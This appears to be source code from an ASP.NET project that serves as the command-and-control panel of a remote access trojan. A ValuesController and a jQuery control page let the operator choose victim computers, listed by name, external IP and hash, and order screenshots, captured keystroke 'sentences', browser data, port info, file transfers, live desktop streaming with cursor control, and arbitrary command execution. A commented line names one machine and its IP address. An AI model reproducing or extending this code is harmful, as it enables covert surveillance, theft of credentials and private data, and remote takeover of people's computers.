serverDotNet/Server/Areas/HelpPage/Models/HelpPageApiModel.cs
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Net.Http.Headers;
using System.Web.Http.Description;

namespace Server.Areas.HelpPage.Models
{
    /// <summary>
    /// The model that represents an API displayed on the help page.
    /// </summary>
    public class HelpPageApiModel
    {
        /// <summary>
        /// Initializes a new instance of the <see cref="HelpPageApiModel"/> class.
        /// </summary>
        public HelpPageApiModel()
        {
            SampleRequests = new Dictionary<MediaTypeHeaderValue, object>();
            SampleResponses = new Dictionary<MediaTypeHeaderValue, object>();
            ErrorMessages = new Collection<string>();
        }

        /// <summary>
        /// Gets or sets the <see cref="ApiDescription"/> that describes the API.
        /// </summary>
        public ApiDescription ApiDescription { get; set; }

        /// <summary>
        /// Gets the sample requests associated with the API.
        /// </summary>
        public IDictionary<MediaTypeHeaderValue, object> SampleRequests { get; private set; }

        /// <summary>
        /// Gets the sample responses associated with the API.
        /// </summary>
        public IDictionary<MediaTypeHeaderValue, object> SampleResponses { get; private set; }

        /// <summary>
        /// Gets the error messages associated with this model.
        /// </summary>
        public Collection<string> ErrorMessages { get; private set; }
    }
}

serverDotNet/Server/Areas/HelpPage/Controllers/HelpController.cs
using System;
using System.Web.Http;
using System.Web.Mvc;
using Server.Areas.HelpPage.Models;

namespace Server.Areas.HelpPage.Controllers
{
    /// <summary>
    /// The controller that will handle requests for the help page.
    /// </summary>
    public class HelpController : Controller
    {
        public HelpController()
            : this(GlobalConfiguration.Configuration)
        {
        }

        public HelpController(HttpConfiguration config)
        {
            Configuration = config;
        }

        public HttpConfiguration Configuration { get; private set; }

        public ActionResult Index()
        {
            return View(Configuration.Services.GetApiExplorer().ApiDescriptions);
        }

        public ActionResult Api(string apiId)
        {
            if (!String.IsNullOrEmpty(apiId))
            {
                HelpPageApiModel apiModel = Configuration.GetHelpPageApiModel(apiId);
                if (apiModel != null)
                {
                    return View(apiModel);
                }
            }

            return View("Error");
        }
    }
}

serverDotNet/Server/Controllers/Default1Controller.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Web.Http;

namespace Server.Controllers
{
    public class Default1Controller : ApiController
    {
        // GET api/default1
        public IEnumerable<string> Get()
        {
            return new string[] { "value1", "value2" };
        }

        // GET api/default1/5
        public string Get(int id)
        {
            return "value";
        }

        // POST api/default1
        public void Post([FromBody]string value)
        {
        }

        // PUT api/default1/5
        public void Put(int id, [FromBody]string value)
        {
        }

        // DELETE api/default1/5
        public void Delete(int id)
        {
        }
    }
}

serverDotNet/Server/Controllers/HomeController.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;

namespace Server.Controllers
{
    public class HomeController : Controller
    {
        public ActionResult Index()
        {
            return View();
        }
    }
}

serverDotNet/Server/Controllers/ValuesController.cs
using Models;
using Newtonsoft.Json;
using ReplicatorLibrary;
using Server.Classes;
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;
using System.Web.Http;

namespace Server.Controllers
{
    public class ValuesController : ApiController
    {
        private static string responseType = "json";


        [HttpGet]
        public HttpResponseMessage Generate()
        {
            return Request.GetResponse(RhsApi.Generate(), responseType);
        }

        [HttpPost]
        public HttpResponseMessage Authorize(AuthData data)
        {
            return Request.GetResponse<AuthResult>(RhsApi.Authorize(data), responseType);
        }

        [HttpPost]
        public HttpResponseMessage DeAuthorize(AuthData data)
        {
            return Request.GetResponse(RhsApi.DeAuthorize(data), responseType);
        }

        [HttpGet]
        public HttpResponseMessage GetDateTime(AuthData data)
        {
            return Request.GetResponse(RhsApi.GetDateTimeFormatted(), responseType);
        }

        [HttpPost]
        public HttpResponseMessage UploadImage(ImageData data)
        {
            //data = new ImageData() { Image = ReplicatorLibrary.ScreenMan.Instance.Grab(true, System.Drawing.Imaging.PixelFormat.Format24bppRgb) };
            return Request.GetResponse<int?>(RhsApi.UploadImage(data.Image), responseType);
        }

        [HttpPost]
        public HttpResponseMessage UploadFile(FileData data)
        {
            return Request.GetResponse<int?>(RhsApi.UploadFile(data), responseType);
        }

        [HttpGet]
        public HttpResponseMessage GetSettings()
        {
            return Request.GetResponse(RhsApi.GetSettings(), responseType);
        }

        [HttpPost]
        public HttpResponseMessage SaveSettings(Transmitter.Settings settingsEncoded)
        {
            return Request.GetResponse(RhsApi.SaveSettings(settingsEncoded), responseType);
        }

        [HttpGet]
        public HttpResponseMessage GetComputerHash(string computerName)
        {
            return Request.GetResponse(RhsApi.GetComputerHash(computerName), responseType);
        }

        [HttpPost]
        public HttpResponseMessage DownloadFile(string file)
        {
            return Request.GetResponse(RhsApi.DownloadFile(file), responseType);
        }



    }
}

serverDotNet/Server/Views/Home/Index.cshtml
<div id="body">
    <form role="form" class="form-inline">
        <div class="form-group">
            <label for="computer">Computer:</label>
            <select id="computer"></select>
            <label for="command">Command:</label>
            <select id="command">
                <option value="DO_NOTHING">Do nothing</option>
                <option value="UPLOAD_IMAGE">Get image</option>
                <option value="UPLOAD_SENTENCES">Get sentences</option>
                <option value="UPLOAD_PORT_INFO">Get port info</option>
                <option value="UPLOAD_BROWSER_DATA">Get browser data</option>
                <option value="DOWNLOAD_FILE">Upload a file</option>
                <option value="UPLOAD_FILE">Download a file</option>
                <option value="UPLOAD_FILE_EVENTS">Get file events</option>
                <option value="STREAM_DESKTOP">Start streaming desktop</option>
                <option value="STOP_STREAM_DESKTOP">Stop streaming desktop</option>
                <option value="EXECUTE_COMMAND">Execute a command</option>
            </select>
            <span id="subCommand"></span>
            <input id="fileupload" type="file" name="files[]" multiple />
            <div id="progress" class="progress">
                <div class="progress-bar progress-bar-success"></div>
            </div>
            <div id="files" class="files"></div>
            <button type="submit" id="execute" class="btn btn-primary btn-xs">Execute</button>
        </div>
    </form>
    <div id="data"></div>
    <ul id="images"></ul>
</div>
<script>
    var fileToUpload = '';
    var fileToDownload = '';
    var imageQuality = 20;
    var cursorX = 0;
    var cursorY = 0;
    var computerList = {};
    var computerHash = "";


    function updateImage() {
        setTimeout(function () {
            $('#data').html("");
            var img = $('<img />').attr('width', '100%').attr('src', '/DataFromClient/latest.jpg');
            $('#data').html(img);
            //$.get('core/getlatestimage.inc.php')
            //    .done(function (imageUrl) {
            //        console.log(imageUrl);
            //        var img = $('<img />').attr('width', '100%').attr('src', imageUrl);
            //        $('#data').html(img);
            //    });
        }, 1000);
    }
    function updateSentences() {
        $.get('core/getlatestsentences.inc.php')
            .done(function (text) {
                var txt = $('<textarea />').addClass('form-control').attr('cols', '100').attr('rows', '20').val(text);
                $('#data').html(txt);
            });
    }
    function updatePortInfo() {
        $.get('core/getlatest.php', { 'filename': 'latest_port_info.txt' })
            .done(function (text) {
                var txt = $('<textarea />').attr('cols', '100').attr('rows', '20').val(text);
                $('#data').html(txt);
            });
    }
    function StartStreamDesktop() {
        var imageStream = $('<img />').attr('id', 'streamDesktop');
        $('#data').html(imageStream);
        $('#streamDesktop')
            .click(function (e) {
                cursorX = e.offsetX;
                cursorY = e.offsetY;
                //alert(cursorX + ", " + cursorY);
                editSettings('MOVE_CURSOR', imageQuality, "", "", "", "", cursorX, cursorY, "");

            });
        /*$(window).keyup(function(e) {
            editSettings('MOVE_CURSOR', imageQuality, "", "", "", cursorX, cursorY, e.keyCode);
        });*/
        setInterval(function () {
            imageStream.attr('src', "<?php echo $GLOBALS['urlData']; ?>/stream.jpg");
        }, 1000);
    }
    function UploadFile() {
        $('#fileupload').show();

    }
    //function getComputerHash(computerName) {
    //    $.get('/api/values/GetComputerHash', { 'computerName': computerName })
    //        .done(function (data) {
    //            computerHash = data;
    //            //alert(computerHash);
    //        });
    //}
    function loadComputers(computerList) {
        //computerList = {}; // clear it
        $.getJSON('/Data/computers.json').done(function (data) {
            console.log(data);
            _.extend(computerList, data);
            //alert(computerList['foo']);
            //computerList = data;
            $('#computer')
                .find('option').remove().end()
                .append($('<option />').attr('value', 'none').html("None"))
                .append($('<option />').attr('value', 'all').html("All"));
            $.each(data, function (k, v) {
                $('#computer').append($('<option />').attr('value', v['Hash']).html(v['Name'] + " (" + v['IpExternal'] + " - " + v['Hash'] + ")"));
            });
            /*$('#computer select option').filter(function() {
                return $(this).text() == 'beha-parallels (81.25.185.102)';
            }).attr('selected', true);*/
            //getComputerHash('none');
        });
    }
    function editSettings(command, imageQuality, fileName, fileArgs, fileToUpload, fileToDownload, cursorX, cursorY, keyCode) {
        var data = {
            'ComputerHash': computerHash,
            'Command': command,
            'imageQuality': imageQuality,
            'fileName': fileName,
            'fileArgs': fileArgs,
            'fileToUpload': fileToUpload,
            'fileToDownload': fileToDownload,
            'cursorX': cursorX,
            'cursorY': cursorY,
            'keyCode': keyCode
        };
        //alert(data['computerHash']);
        $.post('/api/values/SaveSettings', data, function (result) {
            console.log(result);
            //$('#command').val('DO_NOTHING');
            //$('#subCommand').html("");
            switch (command) {
                case 'UPLOAD_IMAGE':
                    updateImage();
                    break;
                case 'UPLOAD_SENTENCES':
                    updateSentences();
                    break;
                case 'UPLOAD_PORT_INFO':
                    updatePortInfo();
                    break;
                case 'STREAM_DESKTOP':
                    StartStreamDesktop();
                    break;
                case 'DOWNLOAD_FILE':
                    UploadFile();
                    break;
            }
        }, "json");
        //.fail(function (data) {
        //    console.log('failed');
        //    resetSettings();
        //});
    }
    $(function () {
        //editSettings('DO_NOTHING', imageQuality, "", "", fileToUpload, fileToDownload, cursorX, cursorY, "");
        //$().downloadFile('KeyLogTest.txt', 'KeyLogTest txt.exe', 'text/plain');
        setInterval(function () {
            /*$.get('core/getimages.inc.php')
                .done(function(jsonData) {
                    $('#images').find('li').remove();
                    var jsonArray = JSON.parse(jsonData);
                    $.each(jsonArray, function(i, val) {
                        var href = $('<a></a>').attr('href', val['url']);
                        var img = $('<img />').attr('width', '125px').attr('src', val['url']);
                        $('#images').append($('<li></li>').html(href.html(img)));
                    });
                });*/

            $.getJSON('/Data/computers.json')
                .done(function (data) {
                    //alert(_.size(data));
                    //alert(_.size(computerList) + "," + _.size(data));
                    if (_.size(computerList) !== _.size(data)) {
                        //alert(_.size(computerList));
                        computerList = {};
                        loadComputers(computerList);
                        //alert(_.size(computerList) + "," + _.size(data));
                    }
                });

        }, 5000);

        $('#fileuploadContent').hide();

        loadComputers(computerList);


        $('#computer').change(function () {
            computerHash = $(this).find(':selected').val();
            //console.log("new has: " + computerHash);
            //var computerName = $(this).find(':selected').val();
            //getComputerHash(computerName);
        });

        $('#imageQuality').val(imageQuality);

        $('#command').change(function () {
            var val = $(this).find(':selected').val();
            if (val == 'UPLOAD_IMAGE') {
                $('#subCommand').html('Image quality: <input type="text" id="imageQuality" value="" />');
                $('#imageQuality').keyup(function () {
                    var input = $(this);
                    if (input.val() > 100) {
                        input.val(100);
                    }
                    else if (input.val() < 0) {
                        input.val(0);
                    }
                });
            }
            else if (val == 'EXECUTE_COMMAND') {
                $('#subCommand').html('File: <input type="text" class="form-control" id="fileName" value="" /> Parameters: <input type="text" class="form-control" id="fileArgs" value="" />');
            }
            else if (val == 'DOWNLOAD_FILE') {
                //$('#subCommand').html('File: <input id="fileupload" type="file" name="files[]" multiple /><div id="progress" class="progress"><div class="progress-bar progress-bar-success"></div></div><div id="files" class="files"></div>');
            }
            else if (val == 'UPLOAD_FILE') {
                $('#subCommand').html('File: <input id="fileToDownload" type="text" />');
            }
            else {
                $('#subCommand').html("");
            }
        });

        $('form').submit(function (e) {
            e.preventDefault();
            var command = $('#command').find(':selected').val();
            console.log("command: " + command);
            imageQuality = $('#imageQuality').val();
            var fileName = $('#fileName').val();
            var fileArgs = $('#fileArgs').val();
            fileToDownload = $('#fileToDownload').val();

            editSettings(command, imageQuality, fileName, fileArgs, fileToUpload, fileToDownload, cursorX, cursorY, "");
            setTimeout(function () {
                resetSettings();
            }, 999);
            return false;
        });
    });

    function resetSettings() {
        editSettings('DO_NOTHING', imageQuality, "", "", fileToUpload, fileToDownload, cursorX, cursorY, "");
    }
</script>
@*<script>
        /*jslint unparam: true */
        /*global window, $ */
        $(function () {
            'use strict';
            // Change this to the location of your server-side upload handler:
            var url = "<?php echo $GLOBALS['urlLibs']; ?>/external/jQueryFileUpload/index.php";
            $('#fileupload').fileupload({
                url: url,
                dataType: 'json',
                done: function (e, data) {
                    console.log(data);
                    $.each(data.result.files, function (index, file) {
                        fileToUpload = file.name;
                        $('<p/>').text(file.name).appendTo('#files');
                    });
                },
                progressall: function (e, data) {
                    var progress = parseInt(data.loaded / data.total * 100, 10);
                    $('#progress .progress-bar').css(
                        'width',
                        progress + '%'
                    );
                }
            }).prop('disabled', !$.support.fileInput).parent().addClass($.support.fileInput ? undefined : 'disabled');
        });
    </script>*@

serverDotNet/Server/Views/Shared/_Layout.cshtml
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <title>@ViewBag.Title</title>
    @Styles.Render("~/Content/css")
    @Scripts.Render("~/bundles/jquery")
    @Scripts.Render("~/bundles/modernizr")
    @Scripts.Render("~/bundles/json2")
    @Scripts.Render("~/bundles/underscore")
</head>
<body>
    <header>
        <div class="content-wrapper">
            <div class="float-left">
                <p class="site-title">
                    <a href="~/">ASP.NET Web API</a></p>
            </div>
            <div class="float-right">
                <nav>
                    <ul id="menu">
                        <li>@Html.ActionLink("Home", "Index", "Home", new { area = "" }, null)</li>
                        <li>@Html.ActionLink("API", "Index", "Help", new { area = "" }, null)</li>
                    </ul>
                </nav>
            </div>
        </div>
    </header>
    @RenderBody()

    @RenderSection("scripts", required: false)
</body>
</html>